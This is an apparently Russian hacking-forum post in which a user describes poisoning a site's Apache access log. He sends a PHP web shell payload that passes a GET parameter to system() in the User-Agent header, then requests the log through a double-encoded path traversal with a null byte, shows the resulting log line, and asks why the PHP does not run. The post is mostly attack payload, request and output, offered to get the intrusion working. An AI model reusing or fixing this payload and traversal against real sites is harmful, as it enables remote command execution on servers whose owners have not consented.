Показать сообщение отдельно

  #8  
Старый 15.07.2012, 22:58
gateout
Новичок
Регистрация: 10.07.2012
Сообщений: 15
С нами: 7284566

Репутация: 0
По умолчанию

на сайт в логи apache засунул через User-agent

'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>

Захожу http://site.com/attachment/..%252F..%252F..%252F..%252F..%252F..%252F..%252F. .%252F..%252F..%252Fvar%252Flog%252Fapache2%252Fsi te.ru_custom.log%2500.jpg

и вижу содержимое лог файла включая

91.221.56.225 - - [15/Jul/2012:21:47:24 +0400] "GET / HTTP/1.1" 200 64697 "-" "'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>"

Но php-получается не исполняется. Что делать?
 
Ответить с цитированием